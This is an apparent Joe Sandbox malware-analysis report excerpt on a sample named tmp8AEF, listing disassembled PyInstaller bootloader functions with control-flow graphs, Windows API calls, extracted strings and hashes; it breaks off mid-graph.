                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 245 7ff7ca7915c0-7ff7ca7915d1 246 7ff7ca7915d3-7ff7ca7915dc call 7ff7ca791050 245->246 247 7ff7ca7915f7-7ff7ca791611 call 7ff7ca793f70 245->247 254 7ff7ca7915ee-7ff7ca7915f6 246->254 255 7ff7ca7915de-7ff7ca7915e9 call 7ff7ca7925f0 246->255 252 7ff7ca791613-7ff7ca79163a call 7ff7ca792760 247->252 253 7ff7ca79163b-7ff7ca791655 call 7ff7ca793f70 247->253 261 7ff7ca791671-7ff7ca791688 call 7ff7ca79f9f4 253->261 262 7ff7ca791657-7ff7ca79166c call 7ff7ca7925f0 253->262 255->254 268 7ff7ca79168a-7ff7ca7916a6 call 7ff7ca792760 261->268 269 7ff7ca7916ab-7ff7ca7916af 261->269 267 7ff7ca7917c5-7ff7ca7917c8 call 7ff7ca79f36c 262->267 275 7ff7ca7917cd-7ff7ca7917df 267->275 278 7ff7ca7917bd-7ff7ca7917c0 call 7ff7ca79f36c 268->278 271 7ff7ca7916b1-7ff7ca7916bd call 7ff7ca7911f0 269->271 272 7ff7ca7916c9-7ff7ca7916e9 call 7ff7ca7a4170 269->272 279 7ff7ca7916c2-7ff7ca7916c4 271->279 282 7ff7ca7916eb-7ff7ca791707 call 7ff7ca792760 272->282 283 7ff7ca79170c-7ff7ca791717 272->283 278->267 279->278 290 7ff7ca7917b3-7ff7ca7917b8 282->290 285 7ff7ca7917a6-7ff7ca7917ae call 7ff7ca7a415c 283->285 286 7ff7ca79171d-7ff7ca791726 283->286 285->290 289 7ff7ca791730-7ff7ca791752 call 7ff7ca79f6bc 286->289 294 7ff7ca791754-7ff7ca79176c call 7ff7ca79fdfc 289->294 295 7ff7ca791785-7ff7ca79178c 289->295 290->278 300 7ff7ca791775-7ff7ca791783 294->300 301 7ff7ca79176e-7ff7ca791771 294->301 297 7ff7ca791793-7ff7ca79179c call 7ff7ca792760 295->297 304 7ff7ca7917a1 297->304 300->297 301->289 303 7ff7ca791773 301->303 303->304 304->285
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                        • API String ID: 2030045667-1550345328
                                                                                        • Opcode ID: 2846edcd738c7b1c6c1bede6bf53d2a981fd655f19fbe5216fb87af41ab02501
                                                                                        • Instruction ID: a458c5a78271867f5074386a494255ffa4cb349959f239fc4155334aa1e4a4c7
                                                                                        • Opcode Fuzzy Hash: 2846edcd738c7b1c6c1bede6bf53d2a981fd655f19fbe5216fb87af41ab02501
                                                                                        • Instruction Fuzzy Hash: 1D518E61B0864391FA10BF37B4609B9A360BF987B6FC441B2EE0D07795EF2CE5648760
                                                                                        Function 00007FF7CA797FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                        • String ID: CreateProcessW$Failed to create child process!
                                                                                        • API String ID: 2895956056-699529898
                                                                                        • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                        • Instruction ID: f12b3981035044a2654949c3ea4a651c204c0cfc626424de18e302af76f872bd
                                                                                        • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                                        • Instruction Fuzzy Hash: 7A414D32A0878291EA20AF25F4652AAB3A0FBDC371F900375EAAD437D5DF7CD4448B50
                                                                                        Function 00007FF7CA7911F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                        • API String ID: 2030045667-2813020118
                                                                                        • Opcode ID: 56c9dbaed340d0ed044521a6c9d65125b35e17f9c64d3b309c5efef7fe4d0be7
                                                                                        • Instruction ID: b5391e1676d64e335cf7a320f6b982baa8b1e2f378caacd0a6270989fd340161
                                                                                        • Opcode Fuzzy Hash: 56c9dbaed340d0ed044521a6c9d65125b35e17f9c64d3b309c5efef7fe4d0be7
                                                                                        • Instruction Fuzzy Hash: E551D262A0864281FA60BF37B460BBAA390BB897A6FC44176DD4D477D5EF3CE4118720
                                                                                        Function 00007FF7CA7AE020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF7CA7AE3BA,?,?,-00000018,00007FF7CA7AA063,?,?,?,00007FF7CA7A9F5A,?,?,?,00007FF7CA7A524E), ref: 00007FF7CA7AE19C
                                                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF7CA7AE3BA,?,?,-00000018,00007FF7CA7AA063,?,?,?,00007FF7CA7A9F5A,?,?,?,00007FF7CA7A524E), ref: 00007FF7CA7AE1A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeLibraryProc
                                                                                        • String ID: api-ms-$ext-ms-
                                                                                        • API String ID: 3013587201-537541572
                                                                                        • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                        • Instruction ID: e539b5b569d69f6f53b1971c1198f23ad4841fdee460c71122e855426a66c7ab
                                                                                        • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                                        • Instruction Fuzzy Hash: AB41F571B19A22A1FA16AF17F820675B2A1BF4CBB2F985175DD0D47784EE3CE8458320
                                                                                        Function 00007FF7CA797C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF7CA793834), ref: 00007FF7CA797CE4
                                                                                        • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF7CA793834), ref: 00007FF7CA797D2C
                                                                                          • Part of subcall function 00007FF7CA797E10: GetEnvironmentVariableW.KERNEL32(00007FF7CA79365F), ref: 00007FF7CA797E47
                                                                                          • Part of subcall function 00007FF7CA797E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7CA797E69
                                                                                          • Part of subcall function 00007FF7CA7A7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CA7A7561
                                                                                          • Part of subcall function 00007FF7CA7926C0: MessageBoxW.USER32 ref: 00007FF7CA792736
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                                        • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                        • API String ID: 740614611-1339014028
                                                                                        • Opcode ID: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                        • Instruction ID: 91cdc93960275bf2f8001bdb1c66751abf2e88145991c7ace678a285fe8fabe2
                                                                                        • Opcode Fuzzy Hash: 11860e683bfeec2df00dcc2c56da5dbb6591d5702bb717516bbb2bb41ff9b0e3
                                                                                        • Instruction Fuzzy Hash: F141AF11A09A4290FA24BF77B9756F99251BF9DBA2FC010B2DD0D47796EE3CE9018360
                                                                                        Function 00007FF7CA7AAD6C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 572 7ff7ca7aad6c-7ff7ca7aad92 573 7ff7ca7aad94-7ff7ca7aada8 call 7ff7ca7a43d4 call 7ff7ca7a43f4 572->573 574 7ff7ca7aadad-7ff7ca7aadb1 572->574 590 7ff7ca7ab19e 573->590 576 7ff7ca7ab187-7ff7ca7ab193 call 7ff7ca7a43d4 call 7ff7ca7a43f4 574->576 577 7ff7ca7aadb7-7ff7ca7aadbe 574->577 596 7ff7ca7ab199 call 7ff7ca7a9bf0 576->596 577->576 579 7ff7ca7aadc4-7ff7ca7aadf2 577->579 579->576 582 7ff7ca7aadf8-7ff7ca7aadff 579->582 585 7ff7ca7aae01-7ff7ca7aae13 call 7ff7ca7a43d4 call 7ff7ca7a43f4 582->585 586 7ff7ca7aae18-7ff7ca7aae1b 582->586 585->596 588 7ff7ca7aae21-7ff7ca7aae27 586->588 589 7ff7ca7ab183-7ff7ca7ab185 586->589 588->589 594 7ff7ca7aae2d-7ff7ca7aae30 588->594 593 7ff7ca7ab1a1-7ff7ca7ab1b8 589->593 590->593 594->585 597 7ff7ca7aae32-7ff7ca7aae57 594->597 596->590 600 7ff7ca7aae59-7ff7ca7aae5b 597->600 601 7ff7ca7aae8a-7ff7ca7aae91 597->601 603 7ff7ca7aae82-7ff7ca7aae88 600->603 604 7ff7ca7aae5d-7ff7ca7aae64 600->604 605 7ff7ca7aae66-7ff7ca7aae7d call 7ff7ca7a43d4 call 7ff7ca7a43f4 call 7ff7ca7a9bf0 601->605 606 7ff7ca7aae93-7ff7ca7aaebb call 7ff7ca7ac90c call 7ff7ca7a9c58 * 2 601->606 609 7ff7ca7aaf08-7ff7ca7aaf1f 603->609 604->603 604->605 637 7ff7ca7ab010 605->637 633 7ff7ca7aaed8-7ff7ca7aaf03 call 7ff7ca7ab594 606->633 634 7ff7ca7aaebd-7ff7ca7aaed3 call 7ff7ca7a43f4 call 7ff7ca7a43d4 606->634 612 7ff7ca7aaf21-7ff7ca7aaf29 609->612 613 7ff7ca7aaf9a-7ff7ca7aafa4 call 7ff7ca7b2c2c 609->613 612->613 614 7ff7ca7aaf2b-7ff7ca7aaf2d 612->614 625 7ff7ca7aafaa-7ff7ca7aafbf 613->625 626 7ff7ca7ab02e 613->626 614->613 618 7ff7ca7aaf2f-7ff7ca7aaf45 614->618 618->613 622 7ff7ca7aaf47-7ff7ca7aaf53 618->622 622->613 627 7ff7ca7aaf55-7ff7ca7aaf57 622->627 625->626 631 7ff7ca7aafc1-7ff7ca7aafd3 GetConsoleMode 625->631 629 7ff7ca7ab033-7ff7ca7ab053 ReadFile 626->629 627->613 632 7ff7ca7aaf59-7ff7ca7aaf71 627->632 635 7ff7ca7ab059-7ff7ca7ab061 629->635 636 7ff7ca7ab14d-7ff7ca7ab156 GetLastError 629->636 631->626 638 7ff7ca7aafd5-7ff7ca7aafdd 631->638 632->613 642 7ff7ca7aaf73-7ff7ca7aaf7f 632->642 633->609 634->637 635->636 644 7ff7ca7ab067 635->644 639 7ff7ca7ab173-7ff7ca7ab176 636->639 640 7ff7ca7ab158-7ff7ca7ab16e call 7ff7ca7a43f4 call 7ff7ca7a43d4 636->640 641 7ff7ca7ab013-7ff7ca7ab01d call 7ff7ca7a9c58 637->641 638->629 646 7ff7ca7aafdf-7ff7ca7ab001 ReadConsoleW 638->646 650 7ff7ca7ab009-7ff7ca7ab00b call 7ff7ca7a4368 639->650 651 7ff7ca7ab17c-7ff7ca7ab17e 639->651 640->637 641->593 642->613 649 7ff7ca7aaf81-7ff7ca7aaf83 642->649 653 7ff7ca7ab06e-7ff7ca7ab083 644->653 655 7ff7ca7ab022-7ff7ca7ab02c 646->655 656 7ff7ca7ab003 GetLastError 646->656 649->613 660 7ff7ca7aaf85-7ff7ca7aaf95 649->660 650->637 651->641 653->641 662 7ff7ca7ab085-7ff7ca7ab090 653->662 655->653 656->650 660->613 665 7ff7ca7ab092-7ff7ca7ab0ab call 7ff7ca7aa984 662->665 666 7ff7ca7ab0b7-7ff7ca7ab0bf 662->666 674 7ff7ca7ab0b0-7ff7ca7ab0b2 665->674 667 7ff7ca7ab0c1-7ff7ca7ab0d3 666->667 668 7ff7ca7ab13b-7ff7ca7ab148 call 7ff7ca7aa7c4 666->668 671 7ff7ca7ab0d5 667->671 672 7ff7ca7ab12e-7ff7ca7ab136 667->672 668->674 675 7ff7ca7ab0da-7ff7ca7ab0e1 671->675 672->641 674->641 677 7ff7ca7ab0e3-7ff7ca7ab0e7 675->677 678 7ff7ca7ab11d-7ff7ca7ab128 675->678 679 7ff7ca7ab103 677->679 680 7ff7ca7ab0e9-7ff7ca7ab0f0 677->680 678->672 682 7ff7ca7ab109-7ff7ca7ab119 679->682 680->679 681 7ff7ca7ab0f2-7ff7ca7ab0f6 680->681 681->679 683 7ff7ca7ab0f8-7ff7ca7ab101 681->683 682->675 684 7ff7ca7ab11b 682->684 683->682 684->672
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                        • String ID:
                                                                                        • API String ID: 3215553584-0
                                                                                        • Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                        • Instruction ID: 526e1b91499e656a934263aa98156c479dc3e8e63386a269effbe7ea5a762aa9
                                                                                        • Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                        • Instruction Fuzzy Hash: 15C10822A0C68771FB10AF16B0202BEB754FBD8BA2F956171E94D07791DE7DEC558320
                                                                                        Function 00007FF7CA797B50 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                        • String ID:
                                                                                        • API String ID: 995526605-0
                                                                                        • Opcode ID: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                                        • Instruction ID: e8062758e099b96dd1fdf00f39dd3351d2cae3f5f081f0465971c74a053c32ca
                                                                                        • Opcode Fuzzy Hash: 748b97fd960fc4e5004671791fa0bd5d217265360f36ca399a643c65045a3ab9
                                                                                        • Instruction Fuzzy Hash: DD216422A0CB4641FB10AF76F460639E3A5FBC97B5F900275EA6D43AE4DF6CD4448710
                                                                                        Function 00007FF7CA7933E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,00007FF7CA793534), ref: 00007FF7CA793411
                                                                                          • Part of subcall function 00007FF7CA7929E0: GetLastError.KERNEL32(?,?,?,00007FF7CA79342E,?,00007FF7CA793534), ref: 00007FF7CA792A14
                                                                                          • Part of subcall function 00007FF7CA7929E0: FormatMessageW.KERNEL32(?,?,?,00007FF7CA79342E), ref: 00007FF7CA792A7D
                                                                                          • Part of subcall function 00007FF7CA7929E0: MessageBoxW.USER32 ref: 00007FF7CA792ACF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$ErrorFileFormatLastModuleName
                                                                                        • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                        • API String ID: 517058245-2863816727
                                                                                        • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                        • Instruction ID: 461ee177c69afbedae8b52f28cbfc0310a9f30a65b6c8f04beec5da2ebdb988f
                                                                                        • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                        • Instruction Fuzzy Hash: 3721E260B1864291FA21BF32F8707B99250BF5C3B6FC041B7DA5D86AE5EE2CE5048360
                                                                                        Function 00007FF7CA798400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00007FF7CA797B50: GetCurrentProcess.KERNEL32 ref: 00007FF7CA797B70
                                                                                          • Part of subcall function 00007FF7CA797B50: OpenProcessToken.ADVAPI32 ref: 00007FF7CA797B83
                                                                                          • Part of subcall function 00007FF7CA797B50: GetTokenInformation.KERNELBASE ref: 00007FF7CA797BA8
                                                                                          • Part of subcall function 00007FF7CA797B50: GetLastError.KERNEL32 ref: 00007FF7CA797BB2
                                                                                          • Part of subcall function 00007FF7CA797B50: GetTokenInformation.KERNELBASE ref: 00007FF7CA797BF2
                                                                                          • Part of subcall function 00007FF7CA797B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7CA797C0E
                                                                                          • Part of subcall function 00007FF7CA797B50: CloseHandle.KERNEL32 ref: 00007FF7CA797C26
                                                                                        • LocalFree.KERNEL32(?,00007FF7CA793814), ref: 00007FF7CA79848C
                                                                                        • LocalFree.KERNEL32(?,00007FF7CA793814), ref: 00007FF7CA798495
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                        • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                        • API String ID: 6828938-1529539262
                                                                                        • Opcode ID: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
                                                                                        • Instruction ID: 1d977b1d102933c60258047caae83c8af19b1fcc10cdecb65517ef8c3270a44a
                                                                                        • Opcode Fuzzy Hash: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
                                                                                        • Instruction Fuzzy Hash: C0215031A0874182F610BF32F5256E9A2A4FF9C7A2FD440B6EA4D43796DF3CD84487A0
                                                                                        Function 00007FF7CA7AC270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 819 7ff7ca7ac270-7ff7ca7ac295 820 7ff7ca7ac563 819->820 821 7ff7ca7ac29b-7ff7ca7ac29e 819->821 824 7ff7ca7ac565-7ff7ca7ac575 820->824 822 7ff7ca7ac2a0-7ff7ca7ac2d2 call 7ff7ca7a9b24 821->822 823 7ff7ca7ac2d7-7ff7ca7ac303 821->823 822->824 826 7ff7ca7ac305-7ff7ca7ac30c 823->826 827 7ff7ca7ac30e-7ff7ca7ac314 823->827 826->822 826->827 829 7ff7ca7ac316-7ff7ca7ac31f call 7ff7ca7ab630 827->829 830 7ff7ca7ac324-7ff7ca7ac339 call 7ff7ca7b2c2c 827->830 829->830 834 7ff7ca7ac33f-7ff7ca7ac348 830->834 835 7ff7ca7ac453-7ff7ca7ac45c 830->835 834->835 838 7ff7ca7ac34e-7ff7ca7ac352 834->838 836 7ff7ca7ac4b0-7ff7ca7ac4d5 WriteFile 835->836 837 7ff7ca7ac45e-7ff7ca7ac464 835->837 841 7ff7ca7ac4e0 836->841 842 7ff7ca7ac4d7-7ff7ca7ac4dd GetLastError 836->842 843 7ff7ca7ac466-7ff7ca7ac469 837->843 844 7ff7ca7ac49c-7ff7ca7ac4ae call 7ff7ca7abd28 837->844 839 7ff7ca7ac363-7ff7ca7ac36e 838->839 840 7ff7ca7ac354-7ff7ca7ac35c call 7ff7ca7a3ae0 838->840 846 7ff7ca7ac37f-7ff7ca7ac394 GetConsoleMode 839->846 847 7ff7ca7ac370-7ff7ca7ac379 839->847 840->839 849 7ff7ca7ac4e3 841->849 842->841 850 7ff7ca7ac488-7ff7ca7ac49a call 7ff7ca7abf48 843->850 851 7ff7ca7ac46b-7ff7ca7ac46e 843->851 864 7ff7ca7ac440-7ff7ca7ac447 844->864 854 7ff7ca7ac39a-7ff7ca7ac3a0 846->854 855 7ff7ca7ac44c 846->855 847->835 847->846 857 7ff7ca7ac4e8 849->857 850->864 858 7ff7ca7ac4f4-7ff7ca7ac4fe 851->858 859 7ff7ca7ac474-7ff7ca7ac486 call 7ff7ca7abe2c 851->859 862 7ff7ca7ac3a6-7ff7ca7ac3a9 854->862 863 7ff7ca7ac429-7ff7ca7ac43b call 7ff7ca7ab8b0 854->863 855->835 865 7ff7ca7ac4ed 857->865 866 7ff7ca7ac500-7ff7ca7ac505 858->866 867 7ff7ca7ac55c-7ff7ca7ac561 858->867 859->864 871 7ff7ca7ac3b4-7ff7ca7ac3c2 862->871 872 7ff7ca7ac3ab-7ff7ca7ac3ae 862->872 863->864 864->857 865->858 868 7ff7ca7ac533-7ff7ca7ac53d 866->868 869 7ff7ca7ac507-7ff7ca7ac50a 866->869 867->824 876 7ff7ca7ac53f-7ff7ca7ac542 868->876 877 7ff7ca7ac544-7ff7ca7ac553 868->877 874 